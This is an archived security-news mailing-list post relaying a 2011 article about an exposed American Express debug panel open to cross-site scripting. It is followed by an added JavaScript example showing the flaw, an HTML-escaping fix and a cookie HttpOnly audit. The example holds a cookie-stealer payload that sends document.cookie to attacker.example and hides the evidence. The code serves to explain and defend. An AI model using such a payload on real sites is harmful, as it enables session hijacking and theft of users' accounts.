Information Security News mailing list archives

Zero-Day Vulnerability On American Express Website Now Closed


From: InfoSec News <alerts () infosecnews org>
Date: Fri, 7 Oct 2011 02:35:50 -0500 (CDT)

http://techcrunch.com/2011/10/06/zero-day-vulnerability-on-american-express-website-now-closed/

By Sarah Perez
TechCrunch
Oct 6, 2011

American Express says it has shut down the webpage that left a portion of its site open to anyone, in what is being called a zero-day security vulnerability, the company said in a statement. The security issue was first discovered by developer Niklas Femerstrand, who attempted to reach out to American Express via Twitter in the hope of being pointed to an email address he could use to send the company further details regarding the issue.

The seemingly confused Twitter rep asked him whether he was an Amex cardholder and offered him a phone number to call, despite his objections to contacting Amex via phone, fax or physical mail. In frustration, Femerstrand published the details to his blog instead.

According to the blog post (also featured here on Hacker News), Femerstrand discovered that American Express developers had accidentally left an administration panel used for website debugging reachable by anyone, leaving the site open to cross-site scripting (XSS) attacks.

“Hackers could inject a cookie stealer combined with jQuery’s .hide() and harvest cookies which can, ironically enough, be exploited by using the admin panel provided by sloppy American Express developers,” wrote Femerstrand on his blog post. He also demonstrated a proof-of-concept attack.
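The quoted attack has two halves: untrusted input reaching the page unescaped, and a session cookie that script is allowed to read. The following is an added example written for this archive, not code from the article or from Femerstrand's post; the debug-panel renderer, the attacker host, the Set-Cookie headers and the payload are all constructed for illustration. It shows the stealer payload in the shape the quote describes (exfiltrate document.cookie, then hide the evidence with jQuery's .hide()), the output-escaping fix that neutralises it, and a Set-Cookie audit that reports which cookies a stealer could read at all.

```javascript
// Added example (not from the article or Femerstrand's post). Names, hosts,
// headers and payload below are constructed for illustration.

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Escape the five HTML-significant characters before interpolating untrusted
// text into markup. This is the fix for reflected XSS in a debug panel.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Hypothetical debug panel that echoes a request parameter verbatim (the
// sloppy variant the article describes) ...
function renderDebugPanelUnsafe(param) {
  return `<div id="debug">Value: ${param}</div>`;
}

// ... and the same panel with output escaping applied.
function renderDebugPanelSafe(param) {
  return `<div id="debug">Value: ${escapeHtml(param)}</div>`;
}

// Constructed attacker payload in the shape the quote describes: ship
// document.cookie to an attacker-controlled host via an image request, then
// hide the panel with jQuery's .hide() so the victim sees nothing unusual.
const COOKIE_STEALER =
  "<script>new Image().src='https://attacker.example/c?'+" +
  "encodeURIComponent(document.cookie);$('#debug').hide()</script>";

// Crude detector: does the rendered HTML still contain a live <script> tag?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Parse a single Set-Cookie header into its name, value and attribute map.
// Attribute names are lower-cased because they are case-insensitive.
function parseSetCookie(header) {
  const [nv, ...attrs] = header.split(";").map((p) => p.trim());
  const eq = nv.indexOf("=");
  const cookie = { name: nv.slice(0, eq), value: nv.slice(eq + 1), attrs: {} };
  for (const a of attrs) {
    const i = a.indexOf("=");
    const k = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    cookie.attrs[k] = i === -1 ? true : a.slice(i + 1);
  }
  return cookie;
}

// A cookie stealer running in the page can read every cookie that lacks
// HttpOnly. Secure is reported separately: it stops plaintext-transport
// leaks, not script access.
function auditCookies(setCookieHeaders) {
  return setCookieHeaders.map(parseSetCookie).map((c) => ({
    name: c.name,
    readableFromScript: !("httponly" in c.attrs),
    secure: "secure" in c.attrs,
  }));
}

// Constructed sample response headers for the audit.
const SAMPLE_HEADERS = [
  "SESSIONID=abc123; Path=/; HttpOnly; Secure",
  "DEBUGTOKEN=deadbeef; Path=/debug",
  "prefs=dark; Path=/; Secure",
];

console.log("unsafe render executes payload:",
  containsScriptTag(renderDebugPanelUnsafe(COOKIE_STEALER)));
console.log("escaped render executes payload:",
  containsScriptTag(renderDebugPanelSafe(COOKIE_STEALER)));
console.log(auditCookies(SAMPLE_HEADERS));
```

Note that HttpOnly only blunts the exfiltration step; it does nothing about the panel itself being reachable, and an injected script can still drive an exposed admin panel from inside the victim's session without ever reading the cookie. Removing the panel from production, as the article says Amex did, is the real fix; escaping and cookie flags are defence in depth.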

[...]
